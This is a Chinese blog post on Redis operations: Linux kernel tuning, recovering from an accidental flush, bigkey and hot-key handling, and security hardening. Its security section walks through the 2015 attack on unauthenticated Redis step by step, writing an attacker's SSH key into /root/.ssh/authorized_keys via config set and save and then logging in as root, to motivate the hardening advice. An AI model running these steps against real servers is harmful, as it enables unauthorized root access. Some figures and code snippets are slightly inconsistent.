# WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
在分析这个问题之前,首先要弄清楚什么是overcommit?Linux操作系统对大部分申请内存的请求都回复yes,以便能运行更多的程序。
因为申请内存后,并不会马上使用内存,这种技术叫overcommit。
如果Redis在启动时有上面的日志,说明vm.overcommit_memory=0,Redis提示把它设置为1。 vm.overcommit_memory用来设置内存分配策略,有三个可选值,如表12-1所示。
相关信息
本节的可用内存代表物理内存与swap之和。 日志中的Background save代表的是bgsave和bgrewriteaof,
如果当前可用内存不足,操作系统应该如何处理fork操作。
如果vm.overcommit_memory=0,代表如果没有可用内存,就申请内存失败,对应到Redis就是执行fork失败,在Redis的日志会出现:
Cannot allocate memory
Redis建议把这个值设置为1,是为了让fork操作能够在低内存下也执行成功。
# cat /proc/sys/vm/overcommit_memory 0
设置:
echo "vm.overcommit_memory=1" >> /etc/sysctl.conf sysctl vm.overcommit_memory=1
在Linux中,并不是要等到所有物理内存都使用完才会使用到swap,系统参数swppiness会决定操作系统使用swap的倾向程度。
swappiness的取值范围是0~100,swappiness的值越大,说明操作系统可能使用swap的概率越高,swappiness值越低,表示操作系统更加倾向于使用物理内存。
swap的默认值是60,了解这个值的含义后,有利于Redis的性能优化。表12-2对swappiness的重要值进行了说明。
相关信息
OOM(Out Of Memory)killer机制是指Linux操作系统发现可用内存不足 时,强制杀死一些用户进程(非内核进程),来保证系统有足够的可用内存 进行分配。
从表12-2中可以看出,swappiness参数在Linux3.5版本前后的表现并不完 全相同,Redis运维人员在设置这个值需要关注当前操作系统的内核版本。
echo {bestvalue} > /proc/sys/vm/swappiness
但是上述方法在系统重启后就会失效,为了让配置在重启Linux操作系统后立即生效,只需要在/etc/sysctl.conf追加vm.swappiness={bestvalue}即可。
echo vm.swappiness={bestvalue} >> /etc/sysctl.conf
需要注意/proc/sys/vm/swappiness是设置操作,/etc/sysctl.conf是追加操作。 3. 如何监控Swap
查看swap的总体情况
Linux提供了free命令来查询操作系统的内存使用情况,其中也包含了 swap的相关使用情况。下面是某台Linux服务器执行free–m(以兆为单位) 的结果,其中需要重点关注的是最后一行的swap统计,从执行结果看, swap一共有4095MB,使用了0MB,空闲4095MB。
在另一台Linux服务器同样执行free-m,这台服务器开启了8189M swap, 其中使用了5241MB。
实时查看swap的使用
Linux提供了vmstat命令查询系统的相关性能指标,其中包含负载、 CPU、内存、swap、IO的相关属性。但其中和swap有关的指标是si和so,它 们分别代表操作系统的swap in和swap out。下面是执行vmstat1(每隔一秒输 出)的效果,可以看到si和so都为0,代表当前没有使用swap。
查看指定进程的swap使用情况
Linux操作系统中,/proc/{pid}目录是存储指定进程的相关信息,其 中/proc/{pid}/smaps记录了当前进程所对应的内存映像信息,这个信息对于 查询指定进程的swap使用情况很有帮助。下面以一个Redis实例进行说明。 通过info server获取Redis的进程号process_id:
redisredis-cli -h ip -p port info server | grep process_id process_id:986
通过cat/proc/986/smaps查询Redis的smaps信息,由于有多个内存块信息,这里只输出一个内存块镜像信息进行观察:
其中Swap字段代表该内存块存在swap分区的数据大小。通过执行如下 命令,就可以找到每个内存块镜像信息中,这个进程使用到的swap量,通 过求和就可以算出总的swap用量:
如果Linux>3.5,vm.swapniess=1,否则vm.swapniess=0,从而实现如下 两个目标:
Redis在启动时可能会看到如下日志:
从提示看Redis建议修改Transparent Huge Pages(THP)的相关配置, Linux kernel在2.6.38内核增加了THP特性,支持大内存页(2MB)分配,默认开启。
当开启时可以降低fork子进程的速度,但fork操作之后,每个内存 页从原来4KB变为2MB,会大幅增加重写期间父进程内存消耗。
同时每次写命令引起的复制内存页单位放大了512倍,会拖慢写操作的执行时间,导致大量写操作慢查询,例如简单的incr命令也会出现在慢查询中。
因此Redis日志中建议将此特性进行禁用,禁用方法如下:
echo never > /sys/kernel/mm/transparent_hugepage/enabled
为了使机器重启后THP配置依然生效,可以在/etc/rc.local中追加echo never>/sys/kernel/mm/transparent_hugepage/enabled。
在设置THP配置时需要注意:有些Linux的发行版本没有将THP放 到/sys/kernel/mm/transparent_hugepage/enabled中,例如Red Hat6以上的THP配 置放到/sys/kernel/mm/redhat_transparent_hugepage/enabled中。
而Redis源码中检查THP时,把THP位置写死:
FILE *fp = fopen("/sys/kernel/mm/transparent_hugepage/enabled","r"); if (!fp) return 0;
所以在发行版中,虽然没有THP的日志提示,但是依然存在THP所带来 的问题:
echo never > /sys/kernel/mm/redhat_transparent_hugepage/enabled
OOM killer会在可用内存不足时选择性地杀掉用户进程,它的运行规则 是怎样的,会选择哪些用户进程“下手”呢?OOM killer进程会为每个用户进 程设置一个权值,这个权值越高,被“下手”的概率就越高,反之概率越低。
每个进程的权值存放在/proc/{progress_id}/oom_score中,这个值是 受/proc/{progress_id}/oom_adj的控制,oom_adj在不同的Linux版本中最小值 不同,可以参考Linux源码中oom.h(从-15到-17)。
当oom_adj设置为最小值时,该进程将不会被OOM killer杀掉,设置方法如下。
shellecho {value} > /proc/${process_id}/oom_adj
对于Redis所在的服务器来说,可以将所有Redis的oom_adj设置为最低 值或者稍小的值,降低被OOM killer杀掉的概率:
shellfor redis_pid in $(pgrep -f "redis-server") do echo -17 > /proc/${redis_pid}/oom_adj done
相关信息
NTP(Network Time Protocol,网络时间协议)是一种保证不同机器时 钟一致性的服务。
我们知道像Redis Sentinel和Redis Cluster这两种功能需要 多个Redis节点的类型,可能会涉及多台服务器。
虽然Redis并没有对多个服务器的时钟有严格要求,但是假如多个Redis实例所在的服务器时钟不一致,对于一些异常情况的日志排查是非常困难的,
例如Redis Cluster的故障转移,如果日志时间不一致,对于我们排查问题带来很大的困扰(注:但不会影响集群功能,集群节点依赖各自时钟)。
一般公司里都会有NTP服务用来提供标准时间服务,从而达到纠正时钟的效果(如图12-1所示),为此我们可以每天定时去同步一次系统时间,从而使得集群中的时间保持统一。
例如每小时的同步1次NTP服务:
0 * * * * /usr/sbin/ntpdate ntp.xx.com > /dev/null 2>&1
在Linux中,可以通过ulimit查看和设置系统当前用户进程的资源数。
其中ulimit-a命令包含的open files参数,是单个用户同时打开的最大文件个数:
shell# ulimit –a…
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8…
Redis允许同时有多个客户端通过网络进行连接,可以通过配置 maxclients来限制最大客户端连接数。对Linux操作系统来说,这些网络连接 都是文件句柄。假设当前open files是4096,那么启动Redis时会看到如下日 志:
# You requested maxclients of 10000 requiring at least 10032 max file descriptors. # Redis can’t set maximum open files to 10032 because of OS error: Operation not permitted. # Current maximum open files is 4096. Maxclients has been reduced to 4064 to compensate for low ulimit. If you need higher maxclients increase ‘ulimit –n’.
日志解释如下:
从上面的三行日志分析可以看出open files的限制优先级比maxclients 大。 Open files的设置方法如下:
ulimit –Sn {max-open-files}
Redis默认的tcp-backlog值为511,可以通过修改配置tcp-backlog进行调 整,如果Linux的tcp-backlog小于Redis设置的tcp-backlog,那么在Redis启动 时会看到如下日志:
# WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/ net/core/somaxconn is set to the lower value of 128.
查看方法:
# cat /proc/sys/net/core/somaxconn
修改方法:
echo 511 > /proc/sys/net/core/somaxconn
相关信息
为了方便说明,下文中除了AOF文件中的flushall/flushdb以外,其他所 有的flushall/flushdb都用flush代替。
假设进行flush操作的Redis是一对主从结构的主节点,其中键值对的个 数是100万,每秒写入量是1000。
被误操作flush后,根据当前Redis是缓存还是存储使用策略有所不同:
缓存
:对于业务数据的正确性可能造成损失还小一点,因为缓存中的数据可以从数据源重新进行构建,但是在第11章介绍了缓存雪崩和缓存穿透的相关知识,当前场景也有类似的地方,如果业务方并发量很大,可能会对后端数据源造成一定的负载压力,这个问题也是不容忽视。存储
:对业务方可能会造成巨大的影响,也许flush操作后的数据是重要配置,也可能是一些基础数据,也可能是业务上的重要一环,如果没有提前做业务降级操作,那么最终反馈到用户的应用可能就是报错或者空白页面等,其后果不堪设想。即使做了相应的降级或者容错处理,对于用户体验也有一定的影响。所以Redis无论作为缓存还是作为存储,如何能在flush操作后快速恢复 数据才是至关重要的。持久化文件肯定是恢复数据的媒介,下面两个小节将 对AOF和RDB文件进行分析。
Redis执行了flush操作后,AOF持久化文件会受到什么影响呢?如下所示:
*1 $8 flushall
虽然Redis中的数据被清除掉了,但是AOF文件还保存着flush操作之前完整的数据,这对恢复数据是很有帮助的。注意问题如下:
Redis执行了flushall操作后,RDB持久化文件会受到什么影响呢?
save 900 1 save 300 10 save 60 10000
那么除非手动执行过save、bgsave或者发生了主从的全量复制,否则RDB文件也会保存flush操作之前的数据,可以作为恢复数据的数据源。注意问题如下:
综上所述,如果AOF已经开启了,那么用AOF来恢复是比较合理的方 式,但是如果AOF关闭了,那么RDB虽然数据不是很实时,但是也能恢复部分数据,完全取决于RDB是什么时候备份的。
当然RDB并不是一无是处,它的恢复速度要比AOF快很多,但是总体来说对于flush操作之后不是最好的恢复数据源。
Redis从节点同步了主节点的flush命令,所以从节点的数据也是被清除 了,从节点的RDB和AOF的变化与主节点没有任何区别。
下面使用AOF作为数据源进行恢复演练。
config set auto-aof-rewrite-percentage 1000 config set auto-aof-rewrite-min-size 100000000000
*1 $8 flushall
本节通过flush误操作的数据恢复,重新梳理了持久化、复制的相关知识,这里建议运维人员提前准备shell脚本或者其他自动化的方式处理,因为故障不等人,对于flush这样的危险操作,应该通过有效的方式进行规避。
2015年11月,全球数万个Redis节点遭受到了攻击,所有数据都被清除了,只有一个叫crackit的键存在,这个键的值很像一个公钥,如下所示。
127.0.0.1:6379> get crackit "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsGWAoHYwBcnAkPaGZ565wPQ0Ap3K7zrf2v9p HPSqW+n8WqsbS+xNpvvcgeNT/fYYbnkUit11RUiMCzs5FUSI1LRthwt4yvpMMbNnEX6J/0W/0nlq PgzrzYflP/cnYzEegKlcXHJ2AlRkukNPhMr+EkZVyxoJNLY+MB2kxVZ838z4U0ZamlPEgzy+zA+oF 0JLTU5fj51fP0XL2JrQOGLb4nID73MvnROT4LGiyUNMcLt+/Tvrv/DtWbo3sduL6q/2Dj3VD0xGD l1kTNAzdj+jOA1Jg1SH53Va34KqIAh2n0Ic+3y71eXV+WouCwkYrDiqqxaGZ7KKmPUjeHTLUEhT5Q == root@zw_xx_192\n\n\n\n"
数据丢失对于很多Redis的开发者来说是致命的,经过相关机构的调查发现,被攻击的Redis有如下特点:
攻击者充分利用Redis的dir和dbfilename两个配置可以使用config set动态设置,以及RDB持久化的特性,将自己的公钥写入到目标机器 的/root/.ssh/authotrized_keys文件中,从而实现了对目标机器的攻陷。攻击过程如图12-2所示。
机器A是攻击者的机器(内网IP:10.10.xx.192),机器B是被攻击者机器(外网IP:123.16.xx.182),上面部署着一个满足上述五个特性的Redis, 下面我们来模拟整个攻击过程。
#ssh root@123.16.xx.182 root@123.16.xx.182's password:
#redis-cli -h 123.16.xx.182 -p 6379 ping PONG #redis-cli -h 123.16.xx.182 -p 6379 flushall OK
# cd /root # ssh-keygen -t rsa # (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > my.pub # cat my.pub ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsGWAoHYwBcnAkPaGZ565wPQ0Ap3K7zrf2v9pHPSqW+n 8WqsbS+xNpvvcgeNT/fYYbnkUit11RUiMCzs5FUSI1LRthwt4yvpMMbNnEX6J/0W/0nlqPgzrzY flP/cnYzEegKlcXHJ2AlRkukNPhMr+EkZVyxoJNLY+MB2kxVZ838z4U0ZamlPEgzy+zA+oF0JLTU 5fj51fP0XL2JrQOGLb4nID73MvnROT4LGiyUNMcLt+/Tvrv/DtWbo3sduL6q/2Dj3VD0xGDl1kTNAzdj +jOA1Jg1SH53Va34KqIAh2n0Ic+3y71eXV+WouCwkYrDiqqxaGZ7KKmPUjeHTLUEhT5Q== root@zw_xx_192
cat my.pub | redis-cli -h 123.16.xx.182 -p 6379 -x set crackit OK redis-cli -h 123.16.xx.182 -p 6379 get crackit "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsGWAoHYwBcnAkPaGZ565wPQ0Ap3K7zrf2v9pHP SqW+n8WqsbS+xNpvvcgeNT/fYYbnkUit11RUiMCzs5FUSI1LRthwt4yvpMMbNnEX6J/0W/0nlqPgz rzYflP/cnYzEegKlcXHJ2AlRkukNPhMr+EkZVyxoJNLY+MB2kxVZ838z4U0ZamlPEgzy+zA+oF0J LTU5fj51fP0XL2JrQOGLb4nID73MvnROT4LGiyUNMcLt+/Tvrv/DtWbo3sduL6q/2Dj3VD0xGDl1 kTNAzdj+jOA1Jg1SH53Va34KqIAh2n0Ic+3y71eXV+WouCwkYrDiqqxaGZ7KKmPUjeHTLUEhT5Q == root@zw_94_190\n\n\n\n"
123.16.xx.182:6379> config set dir /root/.ssh OK 123.16.xx.182:6379> config set dbfilename authorized_keys OK 123.16.xx.182:6379> save OK
此时机器B的/root/.ssh/authorized_keys包含了攻击者的公钥,之后攻击者就可以“为所欲为”了。 6. 此时机器A再通过SSH协议访问机器B,发现可以顺利登录:
[@zw_94_190 ~]# ssh root@123.16.xx.182 Last login: Mon Sep 19 08:42:55 2016 from 10.10.xx.192 757
登录后可以观察/root/.ssh/authorized_keys,可以发现它就是RDB文件:
#cat /root/.ssh/authorized_keys REDIS0006tcrackitA ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsGWAoHYwBcnAkPaGZ565wPQ0Ap3K7zrf2v9pHPSqW+n 8WqsbS+xNpvvcgeNT/fYYbnkUit11RUiMCzs5FUSI1LRthwt4yvpMMbNnEX6J/0W/0nlqPgzrzY flP/cnYzEegKlcXHJ2AlRkukNPhMr+EkZVyxoJNLY+MB2kxVZ838z4U0ZamlPEgzy+zA+oF0JLTU5 fj51fP0XL2JrQOGLb4nID73MvnROT4LGiyUNMcLt+/Tvrv/DtWbo3sduL6q/2Dj3VD0xGDl1kTNA zdj+jOA1Jg1SH53Va34KqIAh2n0Ic+3y71eXV+WouCwkYrDiqqxaGZ7KKmPUjeHTLUEhT5Q== root @zw_xx_192
谁也不想自己的Redis以及机器就这样被攻击吧?本节我们来将介绍如何让Redis足够安全。
Redis的设计目标是一个在内网运行的轻量级高性能键值服务,因为是在内网运行,所以对于安全方面没有做太多的工作,Redis只提供了简单的密码机制,并且没有做用户权限的相关划分。
那么,在日常对于Redis的开发和运维中要注意哪些方面才能让Redis服务不仅能提供高效稳定的服务,还能保证在一个足够安全的网络环境下运行呢?下面将从7个方面进行介绍。
redis-server --requirepass hello_redis_devops
此时通过redis-cli执行命令会收到没有权限的提示:
# redis-cli 127.0.0.1:6379> ping (error) NOAUTH Authentication required.
Redis提供了两种方式访问配置了密码的Redis:
# redis-cli –h 127.0.0.1 –p 6379 –a hello_redis_devops 127.0.0.1:6379> ping PONG
# redis-cli 127.0.0.1:6379> auth hello_redis_devops OK 127.0.0.1:6379> ping PONG
理论上这些命令不应该给普通开发人员使用,那有没有什么好的方法能够防止这些危险的命令被随意执行呢?Redis提供了rename-command配置解决这个问题。
下面直接用一个例子说明rename-command的作用。例如当前 Redis包含10000个键值对,现使用flushall将全部数据清除:
127.0.0.1:6379> flushall OK
例如Redis添加如下配置:
rename-command flushall jlikfjalijl3i4jl3jql34j
那么再执行flushall命令的话,会收到Redis不认识flushall的错误提示,说明我们成功地用rename-command对flushall命令做了伪装:
127.0.0.1:6379> flushall (error) ERR unknown command ‘flushall’
而如果执行jlikfjalijl3i4jl3jql34(随机字符串),那么就可以实现 flushall的功能了,这就是rename-command的作用,管理员可以对认为比较危险的命令做rename-command处理:
127.0.0.1:6379> jlikfjalijl3i4jl3jql34j OK
可以使用防火墙限制输入和输出的IP或者IP范围、端口或者端口范围, 在比较成熟的公司都会对有外网IP的服务器做一些端口的限制,例如只允许 80端口对外开放。因为一般来说,开放外网IP的服务器中Web服务器比较 多,但通常存储服务器的端口无需对外开放,防火墙是一个限制外网访问 Redis的必杀技。
但事实上bind指定的是Redis和哪个网卡进行绑定,和客户端是什么网段没有关系。例如使用ifconfig命令获取当前网卡信息如下:
eth0 Link encap:Ethernet Hwaddr 90:B1:1C:0B:18:02 inet addr:10.10.xx.192 Bcast:10.10.xx.255 Mask:255.255.255.0 … eth1 Link encap:Ethernet Hwaddr 90:B1:1C:0B:18:03 inet addr:220.181.xx.123 Bcast:220.181.xx.255 Mask:255.255.255.0 … lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 …
包含了三个IP地址:
# redis-cli –h 220.181.xx.123 –p 6379 Could not connect to Redis at 220.181.xx.123:6379: Connection refused
只能通过10.10.xx.192作为redis-cli的参数:
# redis-cli –h 10.10.xx.192 10.10.xx.192:6379> ping PONG
bind参数可以设置多个,例如下面的配置表示当前Redis只接受来自 10.10.xx.192和127.0.0.1的网络流量:
bind 10.10.xx.192 127.0.0.1
运维提示
Redis3.0中bind默认值为””,也就是不限制网卡的访问,但是在Redis3.2中必须显示的配置bind0.0.0.0才可以达到这种效果。 2. 建议 经过上面的实验以及对于bind的认识,可以得出如下结论:
Redis3.2提供了protected-mode配置(默认开启),它的含义可以用如下伪代码解释。
if (protected-mode && !requirepass && !bind) { Allow only 127.0.0.1,::1 or socket connections Deny (with the long message ever!) others }
如果当前Redis没有配置密码,没有配置bind,那么只允许来自本机的访问,也就是相当于配置了bind127.0.0.1。
天有不测风云,假如有一天Redis真的被攻击了(清理了数据,关闭了 进程),那么定期备份的数据能够在一定程度挽回一些损失,定期备份持久 化数据是一个比较好的习惯。
Redis的默认端口是6379,不使用默认端口从一定程度上可降低被入侵者发现的可能性,因为入侵者通常本身也是一些攻击程序,对目标服务器进行端口扫描,
例如MySQL的默认端口3306、Memcache的默认端口11211、Jetty的默认端口8080等都会被设置成攻击目标,Redis作为一款较为知名的 NoSQL服务,6379必然也在端口扫描的列表中,
虽然不设置默认端口还是有可能被攻击者入侵,但是能够在一定程度上降低被攻击的概率。
root用户作为管理员,权限非常大。如果被入侵者获取root权限后,就 可以在这台机器以及相关机器上“为所欲为”了。笔者建议在启动Redis服务 的时候使用非root用户启动。事实上许多服务,例如Resin、Jetty、HBase、 Hadoop都建议使用非root启动。
bigkey是指key对应的value所占的内存空间比较大,例如一个字符串类 型的value可以最大存到512MB,一个列表类型的value最多可以存储232-1个 元素。
如果按照数据结构来细分的话,一般分为字符串类型bigkey和非字符 串类型bigkey。
bigkey无论是空间复杂度和时间复杂度都不太友好,下面我们将介绍它的危害。
内存空间不均匀(平衡):例如在Redis Cluster中,bigkey会造成节点的内存空间使用不均匀。
bigkey的存在并不是完全致命的,如果这个bigkey存在但是几乎不被访 问,那么只有内存空间不均匀的问题存在,相对于另外两个问题没有那么重 要紧急,但是如果bigkey是一个热点key(频繁访问),那么其带来的危害不 可想象,所以在实际开发和运维时一定要密切关注bigkey的存在。
redis-cli--bigkeys可以命令统计bigkey的分布,但是在生产环境中,开发和运维人员更希望自己可以定义bigkey的大小,而且更希望找到真正的bigkey都有哪些,这样才可以去定位、解决、优化问题。
判断一个key是否为bigkey,只需要执行debug object key查看serializedlength属性即可,它表示key对应的value序列化之后的字节数,例如我们执行如下操作:
127.0.0.1:6379> debug object key Value at:0x7fc06c1b1430 refcount:1 encoding:raw serializedlength:1256350 lru:11686193 lru_seconds_idle:20
可以发现serializedlength=11686193字节,约为1M,同时可以看到encoding是raw,也就是字符串类型,那么可以通过strlen来看一下字符串的字节数为2247394字节,约为2MB:
127.0.0.1:6379> strlen key (integer) 2247394
serializedlength不代表真实的字节大小,它返回对象使用RDB编码序列化后的长度,值会偏小,但是对于排查bigkey有一定辅助作用,因为不是每种数据结构都有类似strlen这样的方法。 在实际生产环境中发现bigkey的两种方式如下:
相关信息
当发现Redis中有bigkey并且确认要删除时,如何优雅地删除bigkey?无论是什么数据结构,del命令都将其删除。
但是相信通过上面的分析后你一定不会这么做,因为删除bigkey通常来说会阻塞Redis服务。
下面给出一组测试数据分别对string、hash、list、set、sorted set五种数据结构的bigkey进行删除,bigkey的元素个数和每个元素的大小不尽相同。
下面测试和服务器硬件、Redis版本比较相关,可能在不同的服务器上执行速度不太相同,但是能提供一定的参考价值
表12-3展示了删除512KB~10MB的字符串类型数据所花费的时间,总体来说由于字符串类型结构相对简单,删除速度比较快,但是随着value值的不断增大,删除速度也逐渐变慢。
表12-4展示了非字符串类型的数据结构在不同数量级、不同元素大小下对bigkey执行del命令的时间,总体上看元素个数越多、元素越大,删除时间 越长,相对于字符串类型,这种删除速度已经足够可以阻塞Redis。
图12-4是表12-4的折线图,可以更加方便的发现趋势。
从上分析可见,除了string类型,其他四种数据结构删除的速度有可能很慢,这样增大了阻塞Redis的可能性。
既然不能用del命令,那有没有比较优雅的方式进行删除呢,这时候就需要将第2章介绍的scan命令的若干类似命令拿出来:sscan、hscan、zscan。
del bigkey
javapublic void delBigHash(String bigKey) {
Jedis jedis = new Jedis(“127.0.0.1”, 6379);
// 游标
String cursor = “0”;
while (true) {
ScanResult<Map.Entry<String, String>> scanResult = jedis.hscan(bigKey, cursor,
new ScanParams().count(100));
// 每次扫描后获取新的游标
cursor = scanResult.getStringCursor();
// 获取扫描结果
List<Entry<String, String>> list = scanResult.getResult();
if (list == null || list.size() == 0) {
continue;
}
String[] fields = getFieldsFrom(list);
// 删除多个field
jedis.hdel(bigKey, fields);
// 游标为0时停止
if (cursor.equals(“0”)) {
break;
}
}
// 最终删除key
jedis.del(bigKey);
}
/**
* 获取field数组
* @param list
* @return
*/
private String[] getFieldsFrom(List<Entry<String, String>> list) {
List<String> fields = new ArrayList<String>();
for(Entry<String, String> entry : list) {
fields.add(entry.getKey());
}
return fields.toArray(new String[fields.size()]);
}
开发提示: 请勿忘记每次执行到最后执行del key操作。
由于开发人员对Redis的理解程度不同,在实际开发中出现bigkey在所难 免,重要的是,能通过合理的检测机制及时找到它们,进行处理。作为开发 人员在业务开发时应注意不能将Redis简单暴力的使用,应该在数据结构的 选择和设计上更加合理,例如出现了bigkey,要思考一下可不可以做一些优 化(例如拆分数据结构)尽量让这些bigkey消失在业务中,如果bigkey不可 避免,也要思考一下要不要每次把所有元素都取出来(例如有时候仅仅需要 hmget,而不是hgetall)。最后,可喜的是,Redis将在4.0版本支持lazy delete free的模式,那时删除bigkey不会阻塞Redis。
热门新闻事件或商品通常会给系统带来巨大的流量,对存储这类信息的Redis来说却是一个巨大的挑战。
以Redis Cluster为例,它会造成整体流量的不均衡,个别节点出现OPS过大的情况,极端情况下热点key甚至会超过Redis本身能够承受的OPS,因此寻找热点key对于开发和运维人员非常重 要。
下面就从四个方面来分析热点key。
// 使用Guava的AtomicLongMap,记录key的调用次数 public static final AtomicLongMap<String> ATOMIC_LONG_MAP = AtomicLongMap.create(); String get(String key) { counterKey(key); ... } String set(String key, String value) { counterKey(key); ... } void counterKey(String key) { ATOMIC_LONG_MAP.incrementAndGet(key); }
为了减少对客户端代码的侵入,可以在Redis客户端的关键部分进行计数,例如Jedis的Connection类中的sendCommand方法是所有命令执行的枢纽:
public Connection sendCommand(final ProtocolCommand cmd, final byte[]... args) { // 从参数中获取key String key = analysis(args); // 计数 counterKey(key); ... }
同时为了防止ATvOMIC_LONG_MAP过大,可以对其进行定期清理。
public void scheduleCleanMap() { ERROR_NAME_VALUE_MAP.clear(); }
使用客户端进行热点key的统计非常容易实现,但是同时问题也非常 多:
当然除了使用本地字典计数外,还可以使用其他存储来完成异步计数,从而解决本地内存泄露问题。但是另两个问题还是不好解决。 2. 代理端 像Twemproxy、Codis这些基于代理的Redis分布式架构,所有客户端的请求都是通过代理端完成的,如图12-5所示。
此架构是最适合做热点key统计的,因为代理是所有Redis客户端和服务端的桥梁。但并不是所有Redis都是采用此种架构。
3. Redis服务端
使用monitor命令统计热点key是很多开发和运维人员首先想到,monitor命令可以监控到Redis执行的所有命令,下面为一次monitor命令执行后部分结果:
1477638175.920489 [0 10.16.xx.183:54465] "GET" "tab:relate:kp:162818" 1477638175.925794 [0 10.10.xx.14:35334] "HGETALL" "rf:v1:84083217_83727736" 1477638175.938106 [0 10.16.xx.180:60413] "GET" "tab:relate:kp:900" 1477638175.939651 [0 10.16.xx.183:54320] "GET" "tab:relate:kp:15907" ... 1477638175.962519 [0 10.10.xx.14:35334] "GET" "tab:relate:kp:3079" 1477638175.963216 [0 10.10.xx.14:35334] "GET" "tab:relate:kp:3079" 1477638175.964395 [0 10.10.xx.204:57395] "HGETALL" "rf:v1:80547158_83076533"
如图12-6所示,利用monitor命令的结果就可以统计出一段时间内的热点key排行榜、命令排行榜、客户端分布等数据,例如下面的伪代码统计了最近10万条命令中的热点key:
java// 获取10万条命令
List<String> keyList = redis.monitor(100000);
// 存入到字典中,分别是key和对应的次数
AtomicLongMap<String> ATOMIC_LONG_MAP = AtomicLongMap.create();
// 统计
for (String command : commandList) {
ATOMIC_LONG_MAP.incrementAndGet(key);
}
// 后续统计和分析热点key
statHotKey(ATOMIC_LONG_MAP);
Facebook开源的redis-faina [1]正是利用上述原理使用Python语言实现的,
例如下面获取最近10万条命令的热点key、热点命令、耗时分布等数据。
为了减少网络开销以及加快输出缓冲区的消费速度,monitor尽可能在本机执行。
redis-cli -p 6380 monitor | head -n 100000 | ./redis-faina.py Overall Stats ======================================== Lines Processed 50000 Commands/Sec 900.48 Top Prefixes ======================================== tab 27565 (55.13%) rf 15111 (30.22%) ugc 2051 (4.10%) ... Top Keys ======================================== tab:relate:kp:9350 2110 (4.22%) tab:relate:kp:15907 1594 (3.19%) ... Top Commands ======================================== GET 25700 (51.40%) HGETALL 15111 (30.22%) ... Command Time (microsecs) ======================================== Median 622.75 75% 1504.0 90% 2820.0 99% 6798.0
此种方法会有两个问题:
如果站在机器的角度,可以通过对机器上所有Redis端 口的TCP数据包进行抓取完成热点key的统计,如图12-7所示。
此种方法对于Redis客户端和服务端来说毫无侵入,是比较完美的方 案,但是依然存在两个问题:
最后通过表12-5给出上述四种方案的特点。
最后我们总结出解决热点key问题的三种方案。选用哪种要根据具体业务场景来决定。下面是三种方案的思路。
本文作者:Eric
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!